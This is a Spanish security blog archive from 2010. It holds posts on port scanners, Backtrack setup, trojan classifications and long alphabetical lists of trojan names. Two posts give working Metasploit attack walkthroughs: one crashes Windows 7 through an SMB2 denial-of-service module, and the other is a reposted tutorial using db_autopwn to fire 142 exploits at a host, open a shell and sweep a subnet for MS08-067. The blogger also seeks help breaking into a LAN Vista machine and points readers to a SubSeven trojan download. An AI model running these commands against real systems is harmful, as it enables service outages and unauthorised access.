Archivo

Archive for the ‘Seguridad’ Category

Scaners ( Nessus, SuperScan, Advanced IP Scanner )

10 abril, 2010 Deja un comentario

Sin duda alguna el mejor escaneador de puertos y vulnerabilidades de un sistema es Nessus, la cantidad de información que recibes es muy agradecida, y al mismo tiempo es un programa que esta siempre actualizándose, con lo que siempre te indica las vulnerabilidades que sufre el sistema. Aquí podéis ver un vídeo demostración del mismo.

Podéis bajaros este completo escaner desde su pagina web , cuando os bajéis el programa os pedirá que os registréis, dando una cuenta de email, os registráis sin problemas y empezáis a usar esta excepcional aplicación.

Sin embargo, no siempre es necesario un programa tan completo y con tanta parafernalia para hacer un simple scan de puertos abiertos, y es entonces cuando suelo utilizar programas mas simples y de rápido acceso como por ejemplo SuperScan o Advanced IP Scanner. Siempre trabajando bajo plataforma WinX.

Aquí os dejo los links de descarga:

Advanced IP Scanner

SuperScan

Anuncios

Instalar Backtrack 4 en VMware Workstation

1 abril, 2010 3 comentarios

Aquí tenéis un vídeo tutorial de como instalar Backtrack 4 en VMware Workstation. El problema con el que me encontré cuando hice la instalación, es que una vez ejecutado el SO y antes de lanzar startx, no me aparecía ningún mensaje como en este vídeo tutorial advirtiéndome de que tenia que activar los dispositivos de red con el comando ./etc/init.d/networking start. Con lo cual, una vez lanzado el startx me encontrare que no tenia conexión a Internet. Imagino que la versión de Backtrack utilizada en el vídeo es diferente a la que yo uso. Ya que yo me baje la Backtrack 4 Final Release VMware Image desde aquí y en el vídeo hacen la instalación manual en VMware creo que con esta version de Backtrack 4 que en teoría debería ser la misma.

Aquí os dejo el vídeo.

Artículos relacionados:

La Metralleta de Metasploit

Reventando un windows 7 con Metasploit

VMware Workstation 6.5.1 Build

Reventando un Windows 7 con Metasploit

1 abril, 2010 12 comentarios

Para reventar o colgar un sistema windows 7 Ultimate con metasploit, primero deberemos asegurarnos que tiene el puerto 445/tcp netbios-ssn abierto, si este es el caso, lo demás es coser y cantar.

En la consola de metasploit, escribiremos el comando para usar el smb_negotiate_pidhigh :

msf> use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh

A continuación determinamos la IP de la victima con el comando set RHOST “victima ip” . ( en este caso utilizaremos una ip ficticia que sera 192.168.0.5 )

msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.0.5

Despues le indicamos cual es el puerto que vamos a utilizar para el ataque, utilizando el comando set RPORT en este caso sera el 445

msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445

Y por ultimo lanzamos el ataque con el comando run y a esperar a que se cuelgue el sistema.

msf auxiliary(smb2_negotiate_pidhigh) > run

Aquí os dejo un vídeo donde se ejecutan todos los comandos paso a paso.

Aqui os dejo el resultado de un ataque frustrado contra un Windows Vista Home Premium Service Pack 1

msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.35
RHOST => 192.168.1.35
msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
RPORT => 445
msf auxiliary(smb2_negotiate_pidhigh) > run

[*] Sending request and waiting for a reply…
[*] Response received: “000000\236\376SMB@0000000000000000000100010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A00010002020000\37621\321}\256\211\216D\226Ki03A3452601000000000001000000010000000100\320\252Q{\241\321\31201\276/K\361P\276\31201\200003600 LM `340606+0601050502\24022020\240160\f06\n+06010401\20270202\n”
[*] Auxiliary module execution completed
msf auxiliary(smb2_negotiate_pidhigh) >

Artículos relacionados:

La Metralleta de Metasploit

Categorías:Seguridad Etiquetas: , , ,

La metralleta de Metasploit

30 marzo, 2010 7 comentarios
Peleandome con Metasploit en su version Windows y en la version Linux ( Backtrack 4 ) para conseguir una shell en un windows Vista Home Premium service pack 1, me encuentro con la fabulosa pagina web de Pentester.es, donde nos cuentan como crear una base de datos en metasploit para lanzar “X” numero de exploits simultaneos a “X” Hosts simultaneos. Lo que la verdad ahorra mucho trabajo!

Llevo unas 16 horas peleandome con metasploit y la victima Windows Vista sin conseguir ningun resultado. No he conseguido shell, y no he conseguido overflow. Y aunque este windows vista pertenece a LAN donde las acciones deberian ser mas risueñas, no he conseguido nada de nada….

Asi que si alguien quiere darme algun consejo, puede hacerlo en los comentarios, a ver si asi consigo algo interesante y super mis fustraciones.

A continuacion la Entrada de Pentester.es
_______________
_________
Indudable es, que la Metasploit, se ha convertido en una de las herramientas imprescindibles para la auditoría lógica y test de penetración. En este post vamos a centrarnos en su función autopwn o como vulgarmente se le podría definir la “metralleta” de exploits.
Metasploit y función db_autopwn, hacen servir una base de datos (mysql, sqlite3 o postgres soportadas) para albergar el listado de hosts y servicios que queramos auditar de forma automática, permitiendo agilizar el proceso de explotación y penetración de forma sustancial. La manera de alimentar a base de datos con posibles victimas puede partir de nmap o del resultado de un .nbe de Nessus.
En primera instancia vamos a ver como habilitar la funcionalidad “db”, dado que por defecto si Metasploit no encuentra las librerias de Ruby asociadas a la base de datos que vamos a utilizar no será visible para el usuario esta funcionalidad extendida. Para comprobar si se tiene instaladas las dependencias necesarias tan solo tecleamos en la consola de Metasploit “help”, si su resultado es como el siguiente es posible (digo es posible porque a veces no se tiene completaente satisfechas las dependencias) utilizar las funciones extendidas “db”.

| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|

=[ msf v3.3-dev [core:3.3 api:1.0]
+ –=[ 412 exploits – 261 payloads
+ –=[ 21 encoders – 8 nops
=[ 191 aux

msf > help

Core Commands
=============

Command Description
——- ———–
? Help menu
back Move back from the current context

[…]
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers

Database Backend Commands
=========================

Command Description
——- ———–
db_connect Connect to an existing database
db_create Create a brand new database
db_destroy Drop an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver

En el caso de que no apareciera el menu “Database Backend Commands” y suponiendo que estamos en un entorno Debian procedeos a instalar los siguientes paquetes con sus dependencias:

aptitude install sqlite3 libsqlite3-ruby libdbd-sqlite3-ruby libopenssl-ruby nmap

Muy bien, una vez instalado lo anterior procedemos a seleccionar el entorno de base de datos que Metasploit manejará, para ello usaos el comando “db_driver”

msf > db_driver
[*] Active Driver: sqlite3
[*] Available: sqlite3, mysql

En este caso el driver utilizado es sqlite3, si quisiéramos usar mysql, por ejemplo, tecleariamos:

msf > db_driver mysql
[*] Using database driver mysql

A continuación lo que tenemos que hacer es crear la base de datos mediante el comando “db_create nombre”

msf > db_create pentester.es
[*] Creating a new database instance…
[*] Successfully connected to the database
[*] File: pentester.es

Este comando crea y nos conecta a la bd, en el caso de que quisiéramos utilizar una ya existente utilizariamos “db_connect nombre”

msf > db_connect pentester.es
[*] Successfully connected to the database
[*] File: pentester.es

Ahora nos queda “nutrir” a sqlite3 con los host y servicios que queremos auditar para ello nos apoyaremos en el comando “db_nmap”, que no hace otra cosa que llamar a nmap dentro del entorno de Metasploit. En este caso vamos a analizar al host 192.168.2.2.

msf > db_nmap -n -sT -PN 192.168.2.2

[*] exec: “/usr/bin/nmap” “-n” “-sT” “-PN” “192.168.2.2” “-oX” “/tmp/dbnmap20091018-3147-2qv7ko-0”
NMAP:
NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-10-18 22:50 CEST
NMAP: Interesting ports on 192.168.2.2:
NMAP: Not shown: 1709 closed ports
NMAP: PORT STATE SERVICE
NMAP: 53/tcp open domain
NMAP: 80/tcp open http
NMAP: 139/tcp open netbios-ssn
NMAP: 389/tcp open ldap
NMAP: 445/tcp open microsoft-ds
NMAP: 8080/tcp open http-proxy
NMAP:
NMAP: Nmap done: 1 IP address (1 host up) scanned in 2.232 seconds

En este momento Metasploit ha introducido el host 192.168.2.2 y todos sus servicios en la bd. Para comprobarlo podemos usar db_hosts (muestra la maquinas target) y db_services (servicios a auditar para cada maquina)

msf > db_hosts
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Host: 192.168.2.2 Status: alive OS:

msf > db_services
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=53 proto=tcp state=up name=domain
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=80 proto=tcp state=up name=http
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=139 proto=tcp state=up name=netbios-ssn
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=389 proto=tcp state=up name=ldap
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=8080 proto=tcp state=up name=http-proxy

Ya tenemos el objetivo seleccionado, ahora ya tan solo nos queda soltar la metralleta mediate “db_autopwn -t -e -p”. A continuación Metasploit seleccionará todos los exploits disponibles para los servicios almacenados en la bd y solo los que afecten a los puertos seleccionados.

> db_autopwn -t -p -e
[*] Analysis completed in 8.36183190345764 seconds (0 vulns / 0 refs)
[*] Matched exploit/unix/webapp/guestbook_ssi_exec against 192.168.2.2:80…
[*] (1/142): Launching exploit/unix/webapp/guestbook_ssi_exec against 192.168.2.2:80…
[*] Matched exploit/windows/http/savant_31_overflow against 192.168.2.2:80…
[*] (2/142): Launching exploit/w […]

Como vemos Metaesploit ha seleccionado 142 exploits que afectan a los servicios descubiertos, lanzando uno tras otro cual AK-47.
Pero ¿como podemos saber si un exploit lanzado ha tenido exito? Pues con el comando “sessions -l ” se muestran las shells que se han conseguido. Como se puede observar se han conseguido 1 acceso al sistema por 1 exploit que han tenido éxito.

msf > sessions -l
Active sessions
===============
Id Description Tunnel
– ———– ——
1 Command shell 192.168.2.3 -> 192.168.2.2

Para seleccionar una sesión en concreto

msf > sessions -i 1
[*] Starting interaction with 1…
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Este tipo de aproximaciones son bastante arriesgadas dentro de un proceso de pentesting ya que si se ha acordado con el cliente que se producirán las menores DoS posibles este proceso podría tumbar varios servicios o máquinas. Pero si se dispone de libre actuación, la siguiente aproximación sería muy interesante para hacerse con numerosos hosts de la red.

msf > db_nmap -p 445,139 -PN -sS -n 192.168.2.0/24

En un entorno con una política de parcheo “amigable” para el auditor el numero de host Windows afectados por la MS08-067 nos daría muchas alegrias 😉

Saludos Pentesteros.

Categorías:Seguridad, Uncategorized Etiquetas: , ,

Todo sobre los Troyanos. Clasificacion, Manuales, Guias…

9 marzo, 2010 1 comentario

Este articulo es meramente informativo y su intención es la de dar a conocer las vulnerabilidades a las que pueden estar sujetos algunos equipos informáticos respecto a los troyanos en general.

Un Troyano no deja de ser un software malicioso que se oculta en el interior de un programa o archivo de apariencia inocua, cuando este programa o archivo es ejecutado, el troyano actúa ejecutando su código malicioso permitiendo el acceso remoto de un programa y/o usuario no autorizado al sistema. El nombre de Troyano, viene de la historia del Caballo de Troya de la mitología griega.

Los troyanos están programados para permitir el acceso remoto a un usuario o programa. Cuando el troyano se instala en el sistema, el usuario o programa pueden acceder de forma remota al sistema y realizar un sin fin de acciones sin el consentimiento del administrador. Las acciones que puede realizar el troyano, dependerán de los privilegios que este tenga y de las características del troyano.

Estas son algunas cosas que puede hacer un troyano en nuestro sistema:

  • Ocupar el espacio disponible en el disco duro con archivos inutiles, crifrados, duplicados..
  • Apagar o reiniciar el ordenador
  • Borrar, modificar, y transferir archivos
  • Ejecutar o terminar procesos
  • Instalar o desinstalar programas
  • Robar información personal, datos personales, contraseñas, datos bancarios, fotografías…
  • Utilizar nuestro ordenador como parte de una Botnet (para realizar ataques DOS a servidores, enviar spam..)
  • Monotorizar las pulsaciones del teclado ( guardar un registro de todo lo que escribimos )
  • Hacer capturas de pantalla o grabar videoconferencias

Segun la pagina de Sir Arthur´s Den aparecen en la red una media de 22.000 nuevos programas de malware diarios, donde el 77,49% son troyanos.

Según un estudio realizado por la empresa BitDefender desde enero hasta junio de 2009 “El numero de troyanos representan el 83% del malware detetcado

Dependiendo las acciones que hace cada troyano se podrían catalogar en distintos grupos:

  • Backdoors
  • ArcBombs
  • Rootkits
  • Troyanos Espias
  • Troyanos Clickers
  • Troyanos Notifiers
  • Troyanos Downloaders
  • Troyanos Proxies
  • Troyanos Droppers
  • Troyanos Psw
  • Troyanos Varios

En la pagina web de aWEBa nos explican detalladamente estos grupos.

Uno de los troyanos mas famosos ha sido o sigue siendo SubSeven o Sub7, en la pagina oficial podemos encontrar información detallada de este troyano y también podemos descargarlo. en los foros de portalhacker tambien podemos encontrar este completo tutorial sobre SubSeven y aquí os dejo también un vídeo tutorial.

En España, los troyanos están tan divulgados como en el resto del mundo, y una de las cosas que mas puede perjudicar a alguien es que le toquen el bolsillo. La asociación de Internautas redacto un articulo con fecha 27-01-2008 en el que habían descubierto varios servidores con troyanos bancarios españoles y con claves de usuarios. En la investigación se detectaron 4 troyanos que afectaban a las siguientes entidades bancarias:

  • Caja Madrid
  • La Caixa
  • Openbank
  • Grupo Santander
  • Banesto
  • Banco Popular
  • Paypal

Como podemos ver, los troyanos son grandes herramientas, y mal empleadas pueden llegar a hacer muchísimo daño.

Aquí os dejo una lista de distintos troyanos y sus características

Troyanos de la A a la K

Troyanos de la L a la R

Troyanos de la S a la Z

Cambien podéis descargar la lista entera linkeada desde aquí

Categorías:Informática, Seguridad Etiquetas: , , , ,

Lista de Troyanos S-Z

9 marzo, 2010 3 comentarios

Troyanos de la A a la K

Troyanos de la L a la R

Troyanos de la S a la Z

S.U.T.O.T.W.
Sachiel
Sadcase
Sadist
Sadmind
Saltlake
Sambus
Sambut
San
Sancho
Sanctuary
SAPvir
Saran Wrap
sArGeAnts Tool Kit
Sargo
SatanCrew
Satanik
Satans Back Door
SatanzCrew Notifier
SataS Scan Script
Saudiu
Sazo
/sbin/initd
SC-Keylog
Scalper
Scan Trojan
Scanboot
ScannDALO
Scarab
Scary
SCHADENFREUDE
Schedan
ScheduleAgent
Scheduling
Schneckenkorn
School Bus
School Bus TR (modified)
Schwartz
Schwindler
Scooter
Scorpina
Scrambler
Scrambler Trojan
ScrapWorm
Scream
Screen Cutter
ScreenGrab
Screw Notifier
Script.ini
Scull
SD Bot
Sealug
Seamy
Sean
Season
Season
SecHole
Secret Agent
Secret Service
Sector-Zero
Secure Anonymous Mail Bomber – SAMB
SecureWin
Security Breach
Seeker
Seesix
Sender
SendFile
sendm-8.9.3trojan
Senna Spy 2000
Senna Spy 2001
Senna Spy Auto Trojan
Senna Spy FTP server
Senna Spy Local Network Shared 2000
Senna Spy One EXE Maker
Senna Spy One EXE Maker 2000
Senna Spy Trojan Generator
Senna Spy Worm Generator
SenSi
Sensive
Sentinel
Sepro
Septer
Septic
Sequel Remote Control
Serious Trojan
ServeMe
Server4
ServeU
Servidor
ServU
Sesame
Setiri
SetZone
Sevgi
Sex 2000
Sexo
SexPics
Sexu
SFind
Shaden
Shadenfreude
Shadow Phyre
Shadow RAT
Shadow Remote Administrator
Shadyshell
Shaft
Shaggy
Shah
Shake
Shake It
Shakira
Shang
SharaQQ
Share All Your Knowledge
ShareSniffer
Sharpei
Shatrix
Sheehy
Sheep
Sheep
Sheep [no 2]
SheepGoat
Sheepshank
Shek
Shell
Shell Dropper
Shermnar
Shipper
Shit Heep
Shit Trojan
ShitC worm
Shivka-Burka
Shnaz
Shockrave
Shockwave trojan
Shoho
Shorm
Showtee
Shrinker
Shtirlitz
Shut All
Shut-it Downloader
Shutup
Sidea
Silent Spy
Silent Warrior
Silk Rope
Silly
Silly Willy
Silver
Simile
Simona
Simple Greeting Card
Simplified Unix Virus
Simpsons
Simpsons
Sinep
Siner
Singularity
SinRed Killer
Sins
Sint
Sinus
SirCam
Siteno
SK rootkit
Sk Silencer
Skank Pussy
skl0g
SKOSX
Skren
Skullcrush
Skun
SkyDance
Skyfiree Spy
SkyRat
SlackBot
Slak Bot
Slapper
Slayde
Slayv Axis
Slip
SlowDown
SlyDude
Sm4ck
smail
Small
Small
Small Big Brother
Small Share
Smallfeg
Smallfun
SMB Relay
Smev
Smile
Smoke Downloader
Smorph
SMS Star
Snack trojan
Snape
Snav
Sneak
Sneako Bait
Snew
Snex
Snid
Snimak
SniperNet
Snob
Snoop
Snow
SoapSpy
Socia
Sociable
Sockdmini
Sockets des Troie
Socks4D
Soer
Soft-War
SoftWAR
SoFunny
Sohoanywhere
Sol 2.6 keylogger
Solaris
Solaris Integrated Trojan Facility
Solaris rootkit
Soldier DoS
Soldier macro
Solid Gold
Solo
Solved
Son of PsychWard
Sonic
Sonic Boom
Sonitro
Sood
Soshka
SouthPark
Sozz
Sp00fed TCP Shell (Spoofed)
Space Cadet
Spaces
Spadeace
Spam
Spapem
sparcz
Sparki
SpArTa
SpawnMail
Speak Easy
Specrem
Spector
Spector Pro
Speed
Spester
Sphere
Spider
Spie
Spiele
SPing
Spion
Spirit 2000, Spirit 2001
Splash
Splatter
Spmega
Spoof95 trojan
Spoofedlogin
SpOOkeys Keylogger
Spoolsrv
Sppst
SPS Keylog
Spy
SpyAnywhere
SpyBoy
Spying King
SpySender
SRAC-102
srvcp
SSH Backdoor
SSH Rootkit
SSH worm
ssh-2.3.0-patch
SSH2
SShare 2
sshdwarez
ST1
Stacheldraht
Stacheldraht NT
Stages
Stanchild
Stang
Staple
Starbyte
Starfi
Starline
Stars
StartPage
Stator
Stats
Stayrina
STD
Stealth
Stealth Activity Recorder & Reporter – STARR
Stealth Keyboard Interceptor Auto Sender
Stealth Proxy
Stealth Spy
Stealth Tools
Stealth2
StealthMail
StealVXS
Steroid
Stina
STL
Stoogy
Stopin
Storm
Storm worm
Story
STPE
StrangeBrew
Streaming Audio Server
Streaming Audio Trojan
Stretch
Striker trojan
Stryx
Studio 54
Stukach
Su
Su trojan
Sub7xXx
SubCracker
SubSARI
SubSeven
SubSeven 2.1 Gold
Subseven 2.1.4 DefCon 8
SubSeven 2.2
SubSeven 2.2 beta with loader
SubSeven Apocalypse
SubSeven Bonus
SubSeven Java client
SubSeven Logger
SubSeven Mac
SubSeven Muie
SubSeven Regenerator
SubSeven scripts
SubSeven / utilities
SubSeven ZIP files
Subwoofer
SubZero
SuckInfo trojan
SucKIT
Sudden Discharge Compressor
Suerte
Suffer
Sumatrix
Sumo
SunOS rootkit
Suomia
Suonerie
Super Spy
SuperMM
SuperNova
SuperVirus Joke
Superworm
Supova
Suppl
SureSeeker
Surgeon
Sushiquo
Swarm
SweetHeart
Sweetheart Skyfire
Swift Remote
Svinta
Swish
Switches
Swporta
Symopro
Syn Fader
Synapsys
Syphillis
SysAdmin
Sysbat
SysControl
SysExploit
Sysid
Sysinst
Syslogd trojan
Sysmon
Sysnom
SysOCXDLL
SysProtect 98
System 32
System 33
System 666
System Info
System Spy
SystemColor
SysTray
Systray32s
Systsecure
T.R.K
T06 trojan
T0rn Rootkit
Tador
TagOpt
TailGunner
Taiwanes
Take Down Server Suite
Talex
Taliban
Tally
Tam
Tami54
Tapiras
Taskigt
Taskman
TaskMon
Taupe
Taz
Tazr
TCC
TCH Backdoor
TCP Door
TCP remote shell backdoor
tcp shell
TCP Wrappers trojan
TCPshell
Teddybear worm
Teen_Fuck
Tela
TelDetect
TeleCommando
Telefoon
TeLeKit
Teleserv
Telestore
Telnet 2000
Telnet Keylogger
Telnet logger
Telnet Pro
Telnet Server
Telnet Server Faker
Telnet trojan
tELock
TEMan
Tendoolf
Tepille
Terminal Server
Terminator
Terminator
Ternop
Terra
Terror trojan
Test CGI trojan
Tetricycle
Tetris
Tetris
Texron
Thambl
THC Backdoor – Linux
THC Backdoor – OpenBSD
THC Backdoor – Windows
The 1-900 Trojan
The Alien Package
The Cookie Man
The Flu
The Fly
The Freezer
The Hobbit Daemon
The Internet Spy And You
The Invasor
The IP Spoof
The Killer Trojan
The Matrix
The Millenium Worm
The Nix
The Penguin
The Prayer
The ReVeNgEr
The Ripper
The Saint
The Spy
The Spy Mirc
The $ (The Dollar)
The Thief
The Thing
The Thing (modified)
The Traitor (= th3tr41t0r)
The Unexplained
The Y2Kaos trojan
Theef
Theef CGI logger
Theef Download Creator
Theef LE
Thief
Thin Ice
Third Eye
Thrasher
Threat
ThreeForOne
Thrill Kill
Thunderstorm
Tiles
Timebomb
Timegluk
Timofonica
Tin Box
Tini
Tiny Telnet Server – TTS
TinyOpts
Tiong
Titanic
TKT
TNet
TNO
Toal
Tobizan
Toget
Tokez.Auto
Tomato
Tomek
Tongo
TOP
Tornado
Tossed
Tosser
Total Controll
Total Solar Eclypse
Totilix
Toviz
Toxic Ultima
TP worm
TPS trojan
Tqll
TR Killer
Traeger
Trainer
Traitor 21
Trank
Transmitter
TransScout
Trapdoor
Trappy
Trash trojan
Trembler
Trepid
Trex
Tribe Flood Network
Tribe Flood Network 2K
Trilisa
trILLian Rape
Trinity
Trinoo
Trinoo (for Windows)
Tripod
TriRat
Troj2k
Trojan 4283
Trojan Attack
Trojan Cow
Trojan Dropper
Trojan.DV
Trojan Evil
Trojan Hide Tool
Trojan Horse Construction Kit
Trojan Horse Workshop
Trojan Killer
Trojan Man
Trojan Revenge
Trojan Shutdown
Trojan99
TrojanIt kit
trojanized Dsniff
trojanized Fragroute
trojanized Fragrouter
trojanized IRSSI IRC client
trojanized Netcat
trojanized OpenSSH
trojanized Portmap Remote Root Linux Exploit
trojanized ProMail
trojanized Sendmail
Trojo daemon
Tron
Trood
TRP
Truva Atl
Tryit
TS 2001
Ttfloader
Tubma
Tune
Tunnel Shell
Turkish Port Trojan
Tvangeste
Twea
Twelve Tricks
Twinshoe
TYP
Typerec
TypeRecorder
Typhoon
U321
UandMe
UCK – Ultras Construction Kit
UCRT
UDP Backdoor
UDP backdoor
UDP Raw Backdoor
UDP remote shell backdoor server
Ugly FTP
Ugly trojan
Ugy
Ullysse
Ultimate Packer for eXecutables
Ultimate RAT
Ultimax
Ultors Trojan
Ulysses
Unabomber
Uncap
Uncapper
Uncensored
Under
Undernet
Undetected
Undetected plug-ins
Unicle
Unicode rootkit
Unicorn
Unify
Unin68
Unite
UniteMail
Universal login trojan
Universal trojan
Universe
Unknown
Unlocked
Unreal
Updateg
Updater
Uprising
UpSideDown
UPX Scrambler
Uragan
Urick
URL2DWORD
User32
Utter
W0de
v1rootkit
V3res
w95log
Wabbin
VAC
Vaccine
Vacinsa
Vagr Nocker
Vai
VaivNet
Valcard
Valentine
Wally
Walrain
ValvNet
Valvoline
Vampire
WAN Remote
Wanadoo
Vanhouten
Vanina
War Tools
War trojan
WarFactory
Warga
Varible worm
Warning
Varo31
Warpcom
Wasil
Watal
Watcher
Way
VB Troyen
WbeCheck
VBS Encryptor
VC 6
WC Remote Administration Tool
Vcard
VCL.268
Vcmu32
Wconn
WCup
Weather
Web Asylum
Web Server CT
Webcam trojan
Webdownloader
WebDownloader
WebEx
Webserver Lite
Vector Remote Control
Weedb0tz
Weia-Meia
Weird
Weird Binder
Wendel
Venzu
Werd
Verital
Vexed
VGA
wh-crew Spy
Whack Job
Whack-a-mole
Whacked
Whirlpool
White worm
Whitebait
Whitehome
Whiter
Whodo
WhoFramed
Whomp Downloader
Viagra
Wicked Bot
Vicky
Vicwor
Video 25600
Widget
Wiederoeffnen
Vierika
Vig
Wildek
Viled
Win Genocide
Win Pass
Win98 Patch
Winator
Winchkr
WinControl
Wincrash
WinCrash
WinDac
WinData
WindowBomb
Windows Mite
Windows Remote Administrator Reset
WindowsKiller
Windrv
WinDuke
WinError
Winfig
WinFont
WinFuck
WinFucker
WinGrab
WinHack Gold
WinHelp
WinHelper
WinHole
WinKill
WinKiller
Winlock
WinLoop
WinMap
WinNuke eXtreame
Winnuke V
WinPatch
WinPC
WinPort
WinRAT
WinReboot
Winrep32
WinSatan
Winsck
Winshell
WinSKC
WinsKill
Winsock Killer
WinSound
Winsp00fer
WinSpy
WinSys
Winsyst
WinTour
Wintrix
WinTrojan Generator
Winuck
WinView
Winx
WinZapper
Wipe
ViperX
Wiretap Demo
Vireus
Virex 6.1 patch
Virtual Bus
Virtual Hacking Machine – VHM
VirtualAve
VirtualRoot
Virucillin
Vise
Wit
Without
VIV-Net Taker
WKeyKill
Vlades
WLF
VM Christmas Card
WM FTP Server
WM Remote KeyLogger
WM Trojan Generator
WMFA
WMP
VmT
Wobble
Wobbling
Vodni
Voice
Voice Spy
Volcano
Wolfcheat
Voob
Wood Durdyn Aleanrahel Worm
VooDoo Doll
Voodoo worm
WoodWorm
Woowoo
Worm Trojan
Wormkit worm
Worms Generator
Worms Generator 3.0
Vorpal
Wortron
Vote
Wow 23
Vovan
Wowhack
Voyager Alpha Force
VP Killer
WPD
Vpot
WSFT
wu-ftpd trojan
Wukaz
WW III
WWPack32
WWWPW
Wyrvious Invisible Mailer
X.C
X Console
X Jany
X Spy
X-51
X-bill
X-Caliber
X-Exe Joiner
X-ExeJoiner
XalNaga
Xanadu
Xanax
XCan
Xena
XHX
Xic
Xiro
XLog
XMLid.Exploit
Xoom
Xot
Xplorer
XPMsg
Xposure
XRA
Xremote
XTC
Xtcp
XtraAccess
Xtratank
Xtreme
Xzip 6000068
Y-Voice
Y2Kcount
Y3K RAT
Y3K RAT Pro
YaBinder
Yabran
Yagoda
Yaha
Yaha.E, F, G
Yahoo! login
YahooHack
YAI
Yajing
Yama
Yarner
Yeah Yeah
Yello
Yet Another Binder
Yet Another Trojan
Yippee
Yoohoo
yoyo
Yozis
Yvoice
Yytri
ZA Killer
Zacker
Zany
Zap
Zap File
Zaratustra
Zaskena
Zeam
Zeichen
Zelu
Zendown
ZenMaster
Zeraful
ZeroBoot
Zerto
Zeton
Zevach
zget
Zhacker
Zhangpo
Zimenok
ZIP
Zip trojan
Zippy
Zirc
ZKT
Zmutovanej Netbus
Zoek
Zoher
Zom
Zombie
Zombie Joiner
Zomby
Zone Killer
Zoory
Zorro
ZSpy II
Zuke
Zush
Zux
Zync
Zynk
Zyon multibinder

Categorías:Informática, Seguridad Etiquetas: , ,

Lista de Troyanos L-R

9 marzo, 2010 3 comentarios

Troyanos de la A a la K

Troyanos de la L a la R

Troyanos de la S a la Z

Lacoon
LALA Trojan
Lama
Lame
Lame Remote
Lame Webdownloader
Lamers Death
LameSpy
Laminate
Lan Bypasser
LAN Hacker
LAN Sniffer
Lanbad
Lanbyte
LANfiltrator
Langex
Lanus
Laocoon
Laphex
Lara
Lariara
Larva
Last 2000
Last Door
LastScene
LastWord
Latex
Latinus
Lavehn
Lavra
Lazy Admin
LazyVX
lbk
LBM6
Le Guardien
Leave
Led
Lee
Leebill
Legal
Legio
Lennium
Leon
Leszcz
Letter
Leuctra
Level One
Levon
Lez trojan
LFM-926
li0n
Liac
Liberty
Liberty
Libido
Lights in the Sky
Likun
Lil Witch FTP
Limera
Linda
Lindo
Linong
Linspy
Linux Emulator
Linux Integrated Trojan Facility
Linux loadable kernel module backdoor
Linux Rootkit III (3)
Linux Rootkit IV (4)
Linux Rootkit V (5)
Linux Rootkit VI (6)
Liquid
Lisa
Listas
Lite
Lithium
Litmus
Litmus 2a
Little Davinia
Little Witch
Little Witch FTP
LittleBusters
Live List
Live Wite
Live4
Loa
Loading
Lobo
Localhost 2000
Locha
Lockdown
Loding
Log
Logged
Logger
Logic
login
Login Thief
Login trojan
Logo
Lohack
Lohoboyshik
Loki
LolitaFuck
Longvi
LookSpy
Loop
Lornuke
Lovead
LoveBeads
LoveChild
LoveLetter
LoveLetter
LoveYou
LowKill
Lox
lpdw0rm
LRAM KiT 98 BR
ls trojan
Ls trojan
Lucia
Lucky
Lucky2
Lula
Lumorg
Lunatik worm
Lurker
Luzak
Lview
LXW
Lys
M2 trojan
Ma petite amie
Mabra
Mabul
MackBack
MacMag
Mad Deamon
Mad Rat
Madbox
MadBus
Mafiosos
Magic Horse
Magic Lantern
Magic Mushroom
Magical 7
MagicCall
Magistr
Magnitude
Mail Notifer Editor
Mailbomb.b
Mailsteal
MainDelWorms
MainLine
Make You Crazy
Mala-leche
Maldal
Maldal.D
Malicious
Malot
Malpoc
Manager
Mandragore
Maniac rootkit
Manis
Mannequin Hack Trojan
Mantice
Mantis
Manymize
Mard
Marfan
Marie42
Marijuana
Marker
MarkJ Virus
Marry
Massaker
MassMail
Masteal
MasterAngel 97
MasterLock
Masters Paradise
Masy
Matcher
Math Is Fun
Matrix
Maul
Mawanella
Maze
Mb
mBAT
MBot
MBT
Mcon
mcrackaz-fiz
McVeigh
md5 Backdoor
Me_Naked
Me08!
Medusa
Meet the Lamer
Mega
Mega Trance Trojan
Megabyte
Megachar
Megaword
Melanie
Melhack
Melissa
Melissa-X
Mello
Melt, XMelt
Melting
Memory
Menace
Menajeto
Menger
Mentat
Merlin
Messiah
Meta4 Telnet
Metahog
Metal trojan
Metallica
Meteor
Mfunzionality
Micha II
Micro Bot
MicroLog
Microreg
Microsoft.exe
MicroSpy
Miffice
Migrate
Milbug
Milena
Millenium
Millenium (Lm)
Millenium Worm
Millrem
Mimic
Mine
Mini AIM Trojan
Mini Asylum
Mini BackLash
Mini Command
Mini Evangelion
Mini Glitch
Mini Oblivion
Mini Web Downloader
Mini-GiFt
MiniBless
Minicom
MiniCommand
Minizip
Minthread
Mip
Mir
Mirab
Miranda
Mirc extractor
mIRC File Extracting Script Builder
Mirc_New
mirc55t
MircAbuser
mIRCPlus
MircUpdate
Misery1_Trojan
MissWorld
Missy
Mite
MithRa´s Rootkit
Mix
Mizi
Mkworm
MLink
MMedia support
MMX
Mneah
Mobius
Modem Jammer
Modnar
Molecule
Molim
Momaker
Momma
MonaGun
Moncher
Monday worm
Monde
Monk
Monkey
Monkit
Monopoly
MoonPie
Moral
Morgoth Trojan Dropper
Mortag
Mortuary
Mosaic
